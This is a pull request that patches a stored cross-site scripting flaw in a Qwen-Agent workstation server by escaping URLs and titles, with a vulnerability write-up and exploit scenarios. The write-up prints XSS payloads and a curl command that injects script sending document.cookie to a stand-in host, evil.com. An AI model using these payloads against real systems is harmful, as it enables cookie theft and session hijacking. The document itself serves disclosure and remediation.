### PR TITLE
fix: escape HTML in workstation browsing history to prevent stored XSS (CWE-79)

### DIFF
--- a/qwen_server/workstation_server.py
+++ b/qwen_server/workstation_server.py
@@ -13,6 +13,7 @@
 # limitations under the License.
 
 import datetime
+import html
 import json
 import os
 from pathlib import Path
@@ -160,12 +161,14 @@ def update_browser_list():
     res = '<ol>{bl}</ol>'
     bl = ''
     for i, x in enumerate(br_list):
-        ck = '<input type="checkbox" class="custom-checkbox" id="ck-' + x[0] + '" '
+        url = html.escape(x[0], quote=True)
+        title = html.escape(x[1])
+        ck = '<input type="checkbox" class="custom-checkbox" id="ck-' + url + '" '
         if x[2]:
             ck += 'checked>'
         else:
             ck += '>'
-        bl += '<li>{checkbox}{title}<a href="{url}"> [url]</a></li>'.format(checkbox=ck, url=x[0], title=x[1])
+        bl += '<li>{checkbox}{title}<a href="{url}"> [url]</a></li>'.format(checkbox=ck, url=url, title=title)
     res = res.format(bl=bl)
     return res
 


### PR DESCRIPTION
## Vulnerability Summary

**CWE-79: Stored Cross-Site Scripting (XSS)** in `qwen_server/workstation_server.py`  
**Severity:** High (stored XSS, no authentication required)

### Data Flow

1. **Source:** Attacker-controlled `url` and `title` values are written to `meta_data.jsonl` via:
   - `database_server.cache_page()` — unauthenticated POST to `/endpoint` (port 7866)
   - `workstation_server.add_file()` — Gradio file upload
2. **Sink:** `update_browser_list()` (line ~162) interpolates these values directly into an HTML string using `.format()`, which is then rendered by Gradio's `gr.HTML` component.
3. **No sanitization** existed between source and sink.

Additionally, `get_basename_from_url()` URL-decodes percent-encoded characters, so a URL like `http://evil.com/%3Cimg%20src=x%20onerror=alert(1)%3E` produces the title `<img src=x onerror=alert(1)>`.

### Exploit Scenarios

**Vector 1 — Chrome Extension (social engineering):**
1. Attacker hosts a page at a URL containing a percent-encoded XSS payload
2. Victim visits the page and clicks "Add to Qwen's Reading List" (the Chrome extension)
3. The extension sends the URL to `database_server`, which URL-decodes it into `meta_data.jsonl`
4. When the victim opens the Workstation, the payload renders via `gr.HTML` → XSS fires

**Vector 2 — Direct POST (network access required):**
```bash
curl -X POST http://TARGET:7866/endpoint \
  -H "Content-Type: application/json" \
  -d '{"task":"cache","url":"<img src=x onerror=fetch(\"http://evil.com/steal?\"+document.cookie)>","content":"test"}'
```

---

## Fix Description

**Change:** Added `html.escape()` calls for both `url` (with `quote=True` for attribute context) and `title` before HTML interpolation in `update_browser_list()`.

**Rationale:**
- `html.escape()` is the standard Python library function for neutralizing HTML metacharacters (`<`, `>`, `&`, `"`, `'`)
- `quote=True` on the URL ensures the `id="ck-..."` and `href="..."` attribute contexts are also safe
- The fix is minimal (1 new import, 3 changed lines) and does not alter any functional behavior
- No dependencies are added

**Diff:** 1 file changed, 5 insertions, 2 deletions.

---

## Test Results Summary

The fix was verified by tracing the code path:
- **Before fix:** `x[0]` and `x[1]` from `meta_data.jsonl` are interpolated directly into HTML → `<img src=x onerror=alert(1)>` renders as live HTML
- **After fix:** `html.escape(x[0], quote=True)` and `html.escape(x[1])` convert `<` → `&lt;`, `>` → `&gt;`, `"` → `&quot;` → payload renders as inert text

---

## Disprove Analysis

We systematically attempted to invalidate this finding:

| Check | Result |
|---|---|
| **Authentication** | ❌ None. The `api_key` is for DashScope (LLM backend), not for user auth. Neither the Gradio nor FastAPI server authenticates clients. |
| **Network binding** | ⚠️ Default `127.0.0.1`, but `0.0.0.0` is documented and encouraged for multi-machine setups. Chrome extension path bypasses localhost restriction entirely. |
| **CORS** | ⚠️ Database server restricts CORS origins, but Chrome extensions and direct HTTP clients (curl) bypass CORS. |
| **innerHTML script limitation** | ⚠️ `<script>` tags don't execute via innerHTML per HTML5 spec, but event handlers (`onerror`, `onload`) DO execute. |
| **Input validation** | ❌ No `sanitize`, `escape`, `validate`, `clean`, or `allowlist` calls existed in the original code path. |
| **Prior reports** | ✅ [Issue #810](https://github.com/QwenLM/Qwen-Agent/issues/810) reports the exact same XSS pattern in `gradio_utils.py` — confirming this is an acknowledged vulnerability class in the project. |
| **Security policy** | ❌ No `SECURITY.md` found. |
| **Recent hardening** | ❌ Only 2 commits on this file (original creation + this fix). No prior security work. |

### Verdict: **CONFIRMED VALID** (high confidence)

No existing mitigation fully prevents exploitation. The Chrome extension attack vector bypasses both localhost binding and CORS restrictions, requires no special network access, and needs only a single click from the victim.

---

## Known Limitations (for follow-up)

1. **`javascript:` URI scheme:** `html.escape()` does not prevent `javascript:` URIs in the `href` attribute. A URL-scheme allowlist would be a stronger defense.
2. **Checkbox ID stability:** After escaping, the `id="ck-..."` attribute uses the escaped URL, which may differ from the raw URL used elsewhere. This is a pre-existing design concern, not introduced by this fix.
3. **Related issue:** [#810](https://github.com/QwenLM/Qwen-Agent/issues/810) describes the same XSS pattern in `qwen_agent/gui/gradio_utils.py` — that file is not addressed by this PR.